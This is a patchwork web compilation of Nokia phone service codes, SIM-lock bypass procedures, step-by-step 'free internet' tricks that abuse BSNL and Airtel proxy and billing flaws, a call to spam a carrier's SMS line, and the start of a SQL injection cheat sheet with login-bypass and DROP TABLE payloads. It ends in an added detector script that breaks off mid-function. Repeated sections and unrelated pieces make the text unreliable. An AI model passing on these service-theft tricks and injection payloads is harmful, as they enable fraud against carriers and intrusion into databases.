    2. Displays the Month and Year of Manufacture (0997)
    3. Displays (if there) the date where the phone was purchased (MMYY)
    4. Displays the date of the last repair - if found (0000)
    5. Makes you capable of transferring user data if you have the gear for it
    6. Shows how many hours the phone has been on

    Latest software version: 4.77 25-01-00 NSE-5 - EFR and half rate codes do not work with this version.

    V 4.76 13-01-00 NSE-5
    V 4.75 07-01-00 NSE-5
    V 4.73 15.11.99 NSE-5

    Nokia 6190

    *#06# for checking the IMEI (International Mobile Equipment Identity)
    *#6190# shows the SW version.
    *#92772689# (after removing the analog module) shows service menu.
    *3001#12345[OK] to enter test mode.
    *#639# to change NAM.

    Nokia 3810

    To view IMEI number *#06#
    To view Software Version enter *#3810#

    Nokia 6120 / 6160 / 6162 (TDMA phones)

    *#92772689# for checking ISDN number.
    *3001#12345# for field test mode and nam selection and some other stuff...
    *#9999# shows the SW version


    Nokia 3210 Secret Codes
    Nokia 3210

    *#06# for checking the IMEI (International Mobile Equipment Identity) Information you get from the IMEI:

    XXXXXX XX XXXXXX X

    TAC FAC SNR SP


    TAC = Type approval code
    FAC = Final assembly code
    SNR = Serial number
    SP = Spare

    *#0000# To view Software Version.

    #746025625# [*#sim0clock#]
    Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.

    *#92702689# [*#war0anty#] takes you to a secret menu with 6 choices:

    1. Displays Serial Number.
    2. Displays the Month and Year of Manufacture (0997)
    3. Displays (if there) the date where the phone was purchased (MMYY)
    4. Displays the date of the last repair - if found (0000)
    5. Makes you capable of transferring user data if you have the gear for it
    6. Shows how many hours the phone has been on

    Latest software version: V 5.02 NSE-8/9

    *#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
    *#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
    *#4720# - Half Rate Codec activation. It will automatically restart
    *#4720* - Half Rate Codec deactivation. It will automatically restart

    Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ACELP (Algebraic Code Excitation Linear Prediction) compression technology. This technology allows for much greater voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits (but you take up more space on the network, so they can charge you more). Talk-time is reduced by about 5% when using the EFR option.

    SUMIT SINGHAL

    Mixed Bag (Good)

    Mobile Secret Codes



    Nokia 31xx
    ____________

    Firmware version
    *#0000# or *#3110#
    IMEI Code
    *# 06 #
    Restores Factory Settings
    *#7780#
    Warranty Codes
    *#92702689# (= *#war0anty#)

    Just scroll down through the information. If entering the above code requires a
    further warranty code try entering the following:

    6232 (OK) : Month and year of manufacture
    7332 (OK) : Last repair date
    7832 (OK) : Purchase date (if previously set)
    9268 (OK) : Serial number
    37832 (OK) : Set purchase date (this can only be done once)
    87267 (OK) : Confirm transfer

    Nokia 5110
    _____________

    IMEI Number *#06#
    For checking the IMEI (International Mobile Equipment Identity).
    ---------------------------------------------------------
    Security Code 12345
    Default security code is 12345. If you forgot your security code, there are many programs on the net that let you find the security code, like Security ID Generator, Nokia IMEI Changer, etc.

    update:
    Security ID Generator (SID.EXE) and IMEI Generator (NOKIAIMEI.EXE) don't work with Nokia 5110
    Resetting Security Code

    If you accidentally lock the phone or forgot the security code, the best thing to do is check it with your local Nokia dealer. For advanced users, you can use WinTesla, PCLocals or LogoManager to read the security code or reset the code (you will need an FBUS/MBUS (or compatible) cable to do this).
    ---------------------------------------------------------
    Software Version *#0000#
    For checking the phones software (SW) - called firmware revision information.
    e.g.: Version V. 4.51 (26-03-98) will display
    V 04.51
    26-03-98
    NSE-1

    first line:
    The Software Version (my guess is that this software has been used in previous Nokia phones, what do you say?!).

    second line:
    The Date of the SW release.

    third line:
    NHE-8 has something to do with the type of phone you are dealing with. Is it GSM 900 (standard), GSM 1800 (DCS1800) or GSM 1900 (PCS1900)?
    Nokia 2110, 3110, 8110(i) are all NHE types. The only thing that varies is the code after NHE- ("8").
    NHE = GSM 900, NHK = GSM 1800 - The number at the end = the model (2110i = 4 etc.)
    The 5110 and 6110 are called NSE-1 and NSE-3...this may be because they support EFR (?)

    update:
    Newest Software Version was V5.22 (xx-xx-99)
    V 05.22
    01-07-99
    NSE-1

    If your software version is V4.00, upgrade your software to the latest version. V4.00 contains bugs that sometimes show the message
    "SIM Card Not Ready" even when the card is already inside the phone.
    ---------------------------------------------------------

    Software Update
    The only thing to do (for you and me) is to go to the nearest Nokia dealer and have him do it for you. Just remember that it is supposed to be free (a receipt is required), so don't let him tell you anything else!
    ---------------------------------------------------------

    SIM clock *#746025625# [*#sim0clock#]
    to check if the SIM clock can be stopped. This option depends on your service provider network. (SIM-clock-stop is a kind of standby mode which will save battery time)

    update:
    This code doesn't work on phones with software version 4.59.
    ---------------------------------------------------------

    Warranty Code *#92702689# [*#war0anty#]
    Menu:
    Displays Serial Number.
    Displays the Month and Year of Manufacture (0698)
    Displays (if there) the date when the phone was purchased (MMYY); you can set the purchase date here
    (Warning: You can only do this once - so be careful what you write)
    Displays the date of the last repair - if found (0000)
    The next screen has Transfer User Data? (the same option as the 8110)
    To exit turn the phone off and then back on.
    ---------------------------------------------------------

    SP Lock: The Service Provider (SP) lock
    is used to lock the cell phone to the SP's SIM card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from a different operator the phone will refuse to accept it!
    The cell phone will however accept another SIM card from the same operator.

    All Nokia phones (2110 and newer) have four different SIM locks which can be used to lock the phone for up to 4 different providers. But most phones with restriction only have one lock activated. ( lock 1)
    The main code used in Nokia phones is:

    #pw+(master code)+Y#

    This code is able to check, activate or remove Sim card restriction (SP-lock).
    Use the * key to get the p, + and w chars.
    Y has to be 1, 2, 3 or 4 - depending on which lock you want to deal with.

    #pw+1234567890+1# for Provider-Lock status
    #pw+1234567890+2# for Network-Lock status
    #pw+1234567890+3# for Provider(???)-Lock status
    #pw+1234567890+4# for SimCard-Lock status

    (master code) is a 10 digit code, based on the phones IMEI number.
    (I can NOT give you the master code SO DON'T ASK ME FOR IT!)

    Please click here to learn more about how to obtain mastercode and find out the lock status of your phone
    e.g. To remove restriction on lock 1 type the following code:

    #pw+(master code)+1#

    If you just want to check your phone use 10 random numbers Eg. 1234567890 as the (master code)
    e.g. To check if the phone is restricted on lock 1 type the following code:

    #pw+1234567890+1#

    Please NOTE that these codes should be used with care!
    A user told me that it's only possible to type in about 3 different codes on each lock! Then something bad will happen...therefore be careful!
    ---------------------------------------------------------

    How can I check what locks have my phone closed?

    There are 2 methods:
    Use Winlock to see the state of the locks, pressing Read Info. The Counter is the number of times that you have tried to unlock your phone using an incorrect master code.
    You can check it by entering an imaginary master code on your phone, but it's not recommended, because if you try entering a code 5 times your phone will not work anymore. For example, if you press on your phone #pw+1234567890+2# (note that the #, p, w and + characters must be selected from the * key) and your phone gives you "Code Error" then your phone has lock 2 closed; if you get the message "SIM Restriction Off" your phone has lock 2 opened.
    Look at the table below to see how to check all locks:

    Lock number Description Sequence to Check
    1 Provider Lock #pw+1234567890+1#
    2 Network-Lock #pw+1234567890+2#
    3 Another Provider Lock #pw+1234567890+3#
    4 SIM Card Lock #pw+1234567890+4#
    ---------------------------------------------------------
    Unlock SP-Lock
    Here is a way to unlock your phone which is Service Provider locked, without knowing the SP-Lock code. With a Nokia 16xx/21xx/31xx/51xx/81xx that is SIM-locked to one provider you can bypass the SP lock like this:

    First of all, PIN CODE MUST BE ON, then press:

    C

    C and hold until it clears display
    * and hold until start to blink
    * and hold until start to blink
    04***your pin>#

    Each time you turn your phone OFF it resets the lock, so this needs to be done each time you turn your phone ON

    The phone now says: PIN CODE CHANGED (or ACCEPTED)
    and the SIM card is accepted until you restart the phone again.

    NOTE: On version 5.04 Nokia has removed this option!

    update:
    There's another Nokia service provider lock generator for DOS (somewhere on the net) called 5161un.zip (for Nokia 51xx-61xx models). This program uses the #pw+(master code)+1# code to unlock the phone. With this software you need to have access to the EEPROM.. Sad
    ---------------------------------------------------------

    Bypass the SP-lock

    With a Nokia 16xx/21xx/31xx/51xx/81xx that is SIM-locked to one provider you can bypass the SP lock like this:

    Insert the SIM card of a different provider.

    Turn on the phone and press the VOLUME UP key for 3 sec., then release it; the phone says PIN CODE?

    Press the "C" key.

    Then press * and wait until it disappears and appears again, then press * one more time and enter 04*PIN*PIN*PIN#

    The phone now says: PIN CODE CHANGED (or ACCEPTED)
    and the SIM card is accepted until you restart the phone again.

    update:
    On version 5.04 Nokia has removed this option !
    ---------------------------------------------------------

    How to open locks 1 and 4?
    You will need the Winlock software and an MBUS cable to do this. Winlock is a Nokia service program that you can use to open locks 1 and 4. Really you are closing the locks when you do that, but when you write ????? in the MCC+MNC and MSIN text boxes, the phone does not understand it and considers the lock open.

    That trick only works for locks 1 and 4, not for locks 2 and 3. If you do not know your lock type, please read our miscellaneous tips page first, or read the section above on this page.

    Install Winlock 1.10.
    Connect your MBUS Nokia data cable.
    Run Winlock.
    Push Read Phone. If you have Lock 2 or Lock 3 closed you cannot open your phone, but you can try to change Lock 2.
    Select State Close in Lock 1 and Lock 4, fill out the MCC+MNC and MSIN text boxes with ??????? and push Close Locks.
    Now you can use any operator card in your phone. If you get any error when you do that, do the following steps:
    Select State Automatic in Lock 1 and Lock 4 and change the type to User in Lock 1 and Lock 4, fill out the MCC+MNC and MSIN text boxes with ?????????? and push Close Locks.
    Select State Automatic in Lock 1 and Lock 4 and change the type to Factory in Lock 1 and Lock 4, fill out the MCC+MNC and MSIN text boxes with ?????????? and push Close Locks.
    If you continue getting errors you must turn off your phone, reset the computer and try again.
    ---------------------------------------------------------

    How to open lock 2?

    When operator companies close lock 2 you can only use the contract or prepaid card of that operator, but you can use another operator company's prepaid card if you know what GID1 to write.

    Install Winlock.
    Run Winlock.
    Configure Winlock: select menu Winlock->Defaults and change GID byte count to 2.
    Push Read Phone, and write down the GID1 info that appears in lock 2.
    Insert the prepaid card from a different operator company.
    We must find out the GID1 info adequate for our new prepaid or contract card. Take a look at our GID1 list and check if your operator and SIM card type is included; if not, try to get a phone that has lock 2 closed and has the SIM card type that you want to use in your phone, and read the GID1 info with Winlock. You can try to write the most used GID1 codes like 0000, 10FF, 01FF or FFFF, etc.
    Change Lock 2 Type from User to Factory or from Factory to User.
    Push Close Locks.
    Your phone will be reset every time you push Close Locks; if your card is not accepted the GID1 is not correct, repeat from step 4 until you find the correct GID1.
    If you get an error you must turn off your phone, reset the computer and try again.
    If you want your phone to accept your original prepaid card, write in GID1 the code you read at step 2 and close locks.
    Is there a GID1 list?

    In addition to the official way of opening locks that Nokia service centers use with TDB4 or TDF-4 (for WinTesla) security boxes, there are two secret methods:

    Opening the phone and adding a chip to the phone motherboard. But you will lose any warranty on your phone.
    Using special software with an MBUS Nokia cable. I don't have this software. Please don't bother asking me about that. The only thing I know about it is that a friend is removing lock 2 using special software. He doesn't do this for money, only for fun.
    --------------------------------------------------------

    Main Code #pw+(master code)+Y#
    This code is able to check, activate or remove the SIM card restriction (SP-lock).

    Use the * key to get the p, + and w characters.
    Y has to be 1, 2, 3 or 4, depending on which lock you want to deal with.

    #pw+1234567890+1# for Provider-Lock status
    #pw+1234567890+2# for Network-Lock status
    #pw+1234567890+3# for Provider(???)-Lock status
    #pw+1234567890+4# for SimCard-Lock status

    (master code) is a 10-digit code based on the phone's IMEI number.

    update:
    I got a report that told me the code didn't work for Optimus Card.
    ---------------------------------------------------------
    Enhanced Full Rate Codec (EFR)
    Enhanced Full Rate will give you much better sound quality when you enable it. The Enhanced Full Rate CODEC adopted by GSM uses ACELP (Algebraic Code Excited Linear Prediction) compression. This technology allows much greater voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits per second (but you take up more space on the network, so they can charge you more).

    *3370# and EFR will be activated after a reboot of the phone (consumes more power)

    #3370#
    and EFR will be switched off after a reboot of the phone.
    ---------------------------------------------------------

    Half Rate Codec (HR)
    Half Rate will give you worse sound quality, which gives the service provider the opportunity to carry more calls on the network, and you might get a lower charge from them. (Gives you 30% longer talk time.)
    *4720# Half Rate codec will be activated after a reboot of the phone (better standby time)

    #4720# Half Rate codec will be deactivated after a reboot of the phone
    ---------------------------------------------------------

    Unblocking Code
    Unblock PIN1 : **05*PUK*newPIN1*newPIN1#@
    UnBlock PIN2 : **052*PUK2*newPIN2*newPIN2#@
    ---------------------------------------------------------

    Hiding your phone number
    Dial 141 then the number you want to call, e.g. 141#######
    This should stop your number being sent to the called party. (*)
    (*) This only works on UK phones; if anybody has tried this and it works, please let me know.
    ---------------------------------------------------------

    Unlocking PIN2 for software version
    V 05.07
    20.11.98
    NSE-1

    If your SIM card is locked by your SP, you can check it; if it is, you will get the "wrong code" message on the display (use 1234567890 for the check).
    If your SIM card is locked by your SP, you can't unlock PIN2!
    ---------------------------------------------------------

    Blocking phone number at Cantel AT&T

    If you have one of those Cantel AT&T phones, pressing #0000# lets you block your number
    at no extra charge.
    ---------------------------------------------------------

    New Menu on Emergency Calls *3001#12345#

    Brings up a new menu that gives you access to the emergency call numbers (911 etc.). It will give you FREE calls! (only to the numbers you put in the emergency list!!)

    This option depends on your GSM operator.
    ---------------------------------------------------------

    Your number in your display
    Go to menu 3-7 Call cost settings.
    Turn ON the Call costs limit (3-7-1). PIN2 code required.
    Put in the limit with the phone number,
    e.g. my phone # is 019 2184697:
    Enter the limit as 2184697
    Go to menu 3-7-2 Show costs in. PIN2 code required.
    Select Currency.
    Enter Unit price: 1
    Enter Currency name as 019 (per my phone # e.g. above)
    Now the phone number 019 2184697 will remain on the 4th row of the display.
    Secondly, if you press the # key, it prompts which line to use: Line 1 or 2.
    ---------------------------------------------------------
    Free Call Tip

    The tip needs Net Monitor enabled. Be aware that the trick will remove Net Monitor in some software versions like v4.73 and v5.04.
    Launch the Net Monitor in your Nokia 51xx / 61xx
    Execute the test number 497
    Free calling for about 90 sec should now have been activated.
    ---------------------------------------------------------

    Nokia 5110 Pin-Out

    Pin-outs: bottom view, keyboard up, counting from the left

    V V 1 2 3 4 5 6 V
    (o) | | [= = = = = =] | |
    7 8 9 10 11 12

    1 - VIN        Charger input voltage, 8.4 V 0.8 A
    2 - CHRG CTRL  Charger control, PWM 32 kHz
    3 - XMIC       Mic input, 60 mV - 1 V
    4 - SGND       Signal ground
    5 - XEAR       Ear output, 80 mV - 1 V
    6 - MBUS       9600 bit/s
    7 - FBUS_RX    9.6 - 230.4 kbit/s
    8 - FBUS_TX    9.6 - 230.4 kbit/s
    9 - L_GND      Charger / logic ground

    Nokia 61xx
    __________

    Firmware version
    *#0000# or *#61x0#
    IMEI Code
    * # 06 #
    Warranty Codes
    *#92702689# (= *#war0anty#)

    Just scroll down through the information. If entering the above code requires a
    further warranty code try entering the following:

    6232 (OK) : Month and year of manufacture
    7332 (OK) : Last repair date
    7832 (OK) : Purchase date (if previously set)
    9268 (OK) : Serial number
    37832 (OK) : Set purchase date (this can only be done once)
    87267 (OK) : Confirm transfer

    Enhanced Full Rate (EFR) and Half Rate Mode (HFR)

    *3370# to activate Enhanced Full Rate - Makes calls sound better, but
    decreases the battery life by about 5%.(I recommend this one)
    #3370# to deactivate Enhanced Full Rate
    *4720# to activate Half Rate Mode - Drops call quality, but increases battery
    life by about 30%.
    #4720# to deactivate Half Rate Mode

    Nokia 81xx
    _____________

    Show IMEI code
    * # 06 #
    Software Version
    * # 8110 #
    This code shows you software version, date of manufacture and hardware number of your phone.

    Warranty Codes
    *#92702689# (= *#war0anty#)

    Just scroll down through the information. If entering the above code requires a
    further warranty code try entering the following:

    6232 (OK) : Month and year of manufacture
    7332 (OK) : Last repair date
    7832 (OK) : Purchase date (if previously set)
    9268 (OK) : Serial number
    37832 (OK) : Set purchase date (this can only be done once)
    87267 (OK) : Confirm transfer

    Sim Clock information

    To check if the Sim-Clock can be stopped type: *#746025625# (= *#sim0clock#)

    Nokia 8810
    ____________
    Firmware version
    *#0000# or *#8810#
    IMEI Code
    * # 06 #
    Warranty Codes
    *#92702689# (= *#war0anty#)

    Just scroll down through the information. If entering the above code requires a
    further warranty code try entering the following:

    6232 (OK) : Month and year of manufacture
    7332 (OK) : Last repair date
    7832 (OK) : Purchase date (if previously set)
    9268 (OK) : Serial number
    37832 (OK) : Set purchase date (this can only be done once)
    87267 (OK) : Confirm transfer

    Enhanced Full Rate (EFR) and Half Rate Mode (HFR)

    *3370# to activate Enhanced Full Rate - Makes calls sound better, but
    decreases the battery life by about 5%.(I recommend this one)
    #3370# to deactivate Enhanced Full Rate
    *4720# to activate Half Rate Mode - Drops call quality, but increases battery
    life by about 30%.
    #4720# to deactivate Half Rate Mode

    BSNL hack for Internet

    Free gprs in bsnl


    Here are the steps to perform:

    Logic: the server has a major bug by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working.

    Supported devices: all phones with multichannel GPRS support

    For connection on your mobile phone:-

    1) Make two connections like bsnlportal and BSNLPORTAL1

    (the names of the profiles don't matter; you can keep one as billgates and the other as shahrukhkhan, lol. The basic purpose of the names is to enable the user to differentiate between the two accounts.)

    2) Select the application you want to have the full connection working on.
    Supposing it is “web”: now just select the “bsnlportal” profile and select a link like wap.cellone.in. The page will open; just press the red button so that the “web” application goes into the background.
    Make sure that the GPRS connection is still established with the web app. Two parallel lines at the top left of the screen will confirm this.

    3) Now open any other app that requires a web connection, like Opera. Select BSNLPORTAL and open any other link like wap.google.com; you will get an error:

    “Access denied.

    Technical description:
    403 Forbidden - You are not allowed to communicate with the requested resource.”

    The aim of using the other app is to perform multi-channel GPRS; this is verified by seeing some dots on the pre-existing connection established by “web” (step 2).

    4) Close Opera, open web and open a site like esato.com

    5) If everything is done as said here then esato will load and voila! We have the whole internet!

    For connection on PC:

    1) Create a connection and enter the number to be dialed as *99***1#

    2) Enter the following string as the extra initialization command:

    3) Now dial from the PC; the connection will be established

    4) Pick up the phone, open “web” and open “wap.cellone.in”; the phone shows an error.

    5) Close “web” and then from the browser open www.google.com
    and voila! The whole internet is here

    Settings for profiles:

    apn: celloneportal
    ip: 192.168.51.163
    port : 8080

    Leave the other fields blank as they are of the least concern!

    The browser settings on the PC go the same as mentioned above!

    Airtel Hack for free internet


    these are all the tricks available !!

    working too!

    It cannot go beyond this!!


    This write-up will explain how to speed up your Airtel Broadband connection / solve other problems regarding connection failures due to closed ports.

    Although I use Airtel and a Beetel 220 BX modem as the basis for this write-up, the same rules can be applied to others as well. So let's get started. First, make sure your DSL modem is on. Fire up your browser. Type http://192.168.1.1 as the address with the following Username/Password - Username: admin Password: password. Note: these are case sensitive; make sure all are typed in lowercase. Click on Advanced Setup -> NAT in the page that loads. If you do not see these options try entering http://192.168.1.1/main.html as the address. Some routers/modems deliberately try to prevent users from accessing these options. On the NAT virtual servers page click the Add button. Now add the port number that you wish to open up. You can even open up a range of ports using the Add button.

    [Screenshot: Beetel 220 BX NAT virtual servers page]

    This technique can be used for any operating system / modem / service provider. It may vary slightly but the essential principle remains the same.


    ~cheers~

    You need a PC or a Laptop and the required connectivity tools ,ie.,
    Serial/USB cable OR Infrared Device OR Bluetooth dongle

    1) Activate Airtel Live! ( It’s FREE so no probs)

    2) Create TWO Airtel gprs data accounts (yep TWO) and select the
    FIRST as the active profile.

    3) Connect your mobile to the PC (or Laptop) and install the driver for
    your mobile’s modem.

    4) Create a new dial-up connection using the NEW CONNECTION
    WIZARD as follows

    Connecting Device : Your mobile’s modem
    ISP Name : Airtel (or anything you like)
    Phone Number : *99***2# / Try 99***1
    Username and Password : blank

    5) Configure your browser and download manager to use the proxy
    100.1.200.99 and port 8080.( My advice is to use Opera since you
    can browse both wap and regular websites)

    6) Connect to the dial-up account. You will be connected at 115.2
    kbps (but remember, that is a bad joke).

    7) Pick up your mobile and try to access any site. You will get “Access
    Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
    Keep the mobile down.

    8) On the PC (or Laptop) open your browser, enter any address,
    press ENTER and... WAIT

    9) After a few seconds the page will start to load and you have the
    WHOLE internet at your disposal.
    ***************************************************************************************************************

    TWO

    Under DATA COMM
    ~~~~~~~~~~~~

    APN : airtelfun.com

    USERNAME : blank

    PASSWORD : blank

    PASS REQ : OFF

    ALLOW CALLS : AUTOMATIC

    IPADDRESS :

    DNSADDRESS :

    DATA COMP : OFF

    HEADER COMP : OFF


    Under INTERNET PROFILES
    ~~~~~~~~~~~~~~~~

    INTERNET MODE : HTTP or WAP (both worked for me)

    USE PROXY : YES

    IP ADDRESS : 100.1.200.99

    PORT : 8080

    USERNAME :

    PASSWORD :

    No Risk Here, Try it and Enjoy

    Three

    1st go to the settings menu, then to the connectivity tab; now choose the option Data comm., then "DATA ACCOUNTS", go to new account; now the settings are as follows:
    ACCOUNT TYPE: GPRS
    NEW ACCOUNT NAME: A1
    APN: airtelfun.com
    usr name: (blank)
    password: (blank)

    Now save it.
    NOW!
    Go to Internet Settings in connectivity; here choose internet profile, go to new profile; the settings are as below:
    NAME: A1
    CONNECT USING: A1 (which was created in data comm.)
    Save it.
    Now you would be able to see it; now select it and take the "more" option, then select settings. Here the use proxy option will be set to no; if it is no then change it to yes.
    Now go to proxy address and give the address as
    100.1.200.99 and then the port number as 8080
    Usr name:
    password:
    Now save all the settings you made. Come back to connectivity,
    choose streaming settings; now in the connect using option choose A1 that we created; leave the use proxy option as no itself.
    THESE ARE THE SETTINGS
    Now access Airtel Live! from your activated SE phone, go to VIDEO GALLERY OR VIDEO UNLIMITED (varies according to states), choose live streaming, then choose CNBC OR AAJTAK. WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec, then type any web address. If it shows access denied then once again select CNBC and wait for a few more sec than before; if it's fully connected also no prob, it's free, then cancel it, or if you are connected then stop it and the internet is ready to take off. GOOD LUCK SE AIRTEL USERS

    Alternate

    For All Airtel Users

    Requirements:
    1. Airtel Live (available for free)
    2. Nokia Series 60 handset, e.g. 6600, 6630, N series, 7610, 6670 etc.
    3. Opera WAP browser for mobile
    Procedure:

    1. Go to your connection settings and make a new internet profile using the default settings of Airtel Live. Name that new profile anything (for e.g. masala); change the home page of that profile to anything you like, for e.g. www.google.com.

    2. Go to your Opera browser and set the default connection as AIRTEL LIVE. This is the original setting you received through Airtel.

    3. Go to Services (in N6600) or Web (N6630) and change the default profile for connection to masala (the newer one).

    **Note: always make sure that your access point is airtelfun.com

    Apply:

    1. Open Opera and you will see that the homepage of Airtel Live is opened. Minimize the application.

    2. Now open Web using the duplicate profile and you will see that two GPRS connections will work simultaneously, and at the Web or the Services page it will show "Unable to connect" or any error. Well, that's the signal of your success.

    3. Simply go on Opera with Web on and open any site you want for free. No charges, no nothing.

    You can also use it through your computer..........

    someone said this too


    The main principle behind this is we have to fool the BSNL techies to activate portal and thus get GPRS activated / get the "G" signal on your cell, as the BSNL portal (wap.cellone.in) needs the GPRS signal on your cell (whether GPRS is formally activated/registered or not (by my method) I don't know)

    NORMALLY THEY DON'T DO THAT IN SPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!!
    AND THEY WILL GIVE YOU A NUMBER OF REASONS----
    ---THAT portal is message based, so go to the cellone icon in the menu and use that SMS based portal (what the f**k)
    ---THAT portal service will be activated when you activate GPRS by filling up the form and registering at the nearest CCN!!
    ---THAT your handset has some problems (if you say that the "G" signal is not present)
    ----etc, etc!!

    YOU HAVE TO ACTIVATE PORTAL FIRST WHICH IS FREE AND YOU CAN EAT UP CC'S FOR THIS REASON!!
    SO WHAT YOU HAVE TO DO IS--
    1) SEND PORTAL to 3733 AND CONFIRMATION SHOULD COME WITHIN 5 MIN AT MAXIMUM!!
    2) SEND AT LEAST 20-30 TIMES (CAN BE ANY MORE THAN THAT)
    JUST S**K UP THE NETWORK (3733) WITH THESE MESSAGES!!!
    THAT'S FREE, NO!! BOTH ON POST AND PRE!!
    3) NOW ALONG WITH THAT ALSO SEND 20-40 SMS AS GPRS TO 3733
    (NO. OF SMS DIRECTLY PROPORTIONAL TO HATE FOR BSNL AND HOW EARLY YOU WANT TO GET YOUR GPRS ACTIVATED) this is also free both on post and pre!!
    4) YOU WILL GET CONFIRMATION IN BOTH CASES AND THE MSG TELLS YOU TO GET SETTINGS FROM 9400024365, THE NO. OF CC!!
    HERE AT MY PLACE I CAN DIAL 9419024365 ALSO!
    BOTH ARE TOLL FREE AND BOTH ARE LOCATED IN CHANDIGARH!!!
    (((((((AND SOME OF THE CC'S SAY they can't give such sensitive information as where they are located, as if they have a 3rd world of their own! and the other dumbs said that they are in chandigarh!!!!)))))

    I WOULD ADVISE ALL FIRST, to call them once to get the settings!!
    (most of the time that is incorrect but gives you an idea of the settings in your area))
    Try and in your 1st call only,
    talk roughly and tell them you are calling for the 10-20th time just for settings and is that their service!!!
    5) Now when you get them save them AND please post them here!!!
    6) now GET AT LEAST 2-3 COMPLAINTS REGISTERED (each after 1 day) THAT YOUR PORTAL HAS NOT BEEN ACTIVATED AND GET THEIR SERIAL NO.
    and in the end bombard them about the status of all those complaints!!
    before registering your complaint they will hesitate much and always say that they will be sending new settings which are accurate! but don't believe them and just register complaints!!
    7) AFTER THAT, you have to only wait until the "G" signal is there on your screen!!

    LOOK, WHAT I HAVE WRITTEN ABOVE IS THE METHOD by which I got my "G" service activated!!! without filling any form or such and without any money drain!!
    maybe since it bypasses the formal way of registration, that is why this trick is working!!!!!!!!!!!!


    You may also try this


    First open your msg window and type LIVE and send it to 2567 so that after 5 min you get the settings of Airtel Live, or if you already have them there is no need for this procedure.
    Now open that setting and copy all the settings from it and create one access point manually which has all the settings like Airtel Live has.
    Now only one change will be there, and it would be in the access point name, which is "Airtelmms.com" instead of the original "Airtelgprs.com".
    OK, you've done it; just activate that setting and access free Airtel GPRS on your phone.

    Another Trick

    somya_cse
    You need a PC or a Laptop and the required connectivity tools ,ie.,
    Serial/USB cable OR Infrared Device OR Bluetooth dongle

    1) Activate Airtel Live! ( It’s FREE so no probs)

    2) Create TWO Airtel gprs data accounts (yep TWO) and select the
    FIRST as the active profile.

    3) Connect your mobile to the PC (or Laptop) and install the driver for
    your mobile’s modem.

    4) Create a new dial-up connection using the NEW CONNECTION
    WIZARD as follows

    Connecting Device : Your mobile’s modem
    ISP Name : Airtel (or anything you like)
    Phone Number : *99***2#
    Username and Password : blank

    5) Configure your browser and download manager to use the proxy
    100.1.200.99 and port 8080.( My advice is to use Opera since you
    can browse both wap and regular websites)

    6) Connect to the dial-up account. You will be connected at 115.2
    kbps (but remember, that is a bad joke).

    7) Pick up your mobile and try to access any site. You will get “Access
    Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
    Keep the mobile down.

    8) On the PC (or Laptop) open your browser, enter any address,
    press ENTER and... WAIT

    9) After a few seconds the page will start to load


    The main thing is the advanced initialization command.
    A recent comment says that:

    Guys I tried and it's working. I'm using Airtel Chennai; the Method TWO worked. Also I request everyone to change the phone number from *99***2 to *99***1 and it's working. It'll get connected at 462.8 kbps but that's the speed between the phone and your computer; the actual bandwidth is 42 kbps


    Most common injection : ' OR ''='

    Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks

    Ending / Commenting Out / Line Comments

    Line Comments: comment out the rest of the query.
    Line comments are generally useful for ignoring the rest of the query so you don't have to deal with fixing the syntax.
    • -- (SM)
      DROP sampletable;--

    • # (M)
      DROP sampletable;#
    Line Comments Sample SQL Injection Attacks
    • Username: admin'--
    • SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
      This is going to log you in as the admin user, because the rest of the SQL query will be ignored.
    Inline Comments: comment out the rest of the query by not closing them, or use them for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
    • /*Comment Here*/ (SM)
      • DROP/*comment*/sampletable
      • DR/**/OP/*bypass blacklisting*/sampletable
      • SELECT/*avoid-spaces*/password/**/FROM/**/Members

    • /*! MYSQL Special SQL */ (M)
      This is a special comment syntax for MySQL. It's perfect for detecting the MySQL version. If you put code inside these comments it's going to execute in MySQL only. You can also use this to execute some code only if the server version is higher than the supplied version.

      SELECT /*!32302 1/0, */ 1 FROM tablename
    Classical Inline Comment SQL Injection Attack Samples
    • ID: 10; DROP TABLE members /*
      Simply gets rid of other stuff at the end of the query. Same as 10; DROP TABLE members --

    • SELECT /*!32302 1/0, */ 1 FROM tablename
      Will throw a division by zero error if the MySQL version is higher than 3.23.02
    MySQL Version Detection Sample Attacks
    • ID: /*!32302 10*/
    • ID: 10
      You will get the same response if the MySQL version is higher than 3.23.02

    • SELECT /*!32302 1/0, */ 1 FROM tablename
      Will throw a division by zero error if the MySQL version is higher than 3.23.02
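As an added example (not part of the original cheat sheet), a small detector for the comment, version-comment, hex and tautology tricks above, run over constructed access-log lines. It URL-decodes each parameter and strips inline comments in two ways, because DR/**/OP must be read as DROP while UNION/**/SELECT must keep its word boundary; the log lines, parameter names and indicator names are assumed for the demo.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Patterns for the tricks in the cheat sheet. PRE_STRIP runs on the decoded
# value before comments are removed; POST_STRIP runs on the stripped, lower-cased
# variants produced by _variants().
PRE_STRIP = {
    "mysql_version_comment": re.compile(r"/\*!\d*"),          # /*!32302 ... */
}
POST_STRIP = {
    "line_comment": re.compile(r"(--|#)\s*$"),                 # admin'--
    "unterminated_inline_comment": re.compile(r"/\*"),         # 10; DROP ... /*
    "stacked_query": re.compile(r";\s*(drop|insert|update|delete|exec)\b"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "tautology": re.compile(r"\bor\b\s*(?:'[^']*'|\d+)\s*=\s*(?:'|\d)"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
}


def _variants(decoded):
    """Two comment-stripped variants: comments deleted (DR/**/OP -> DROP) and
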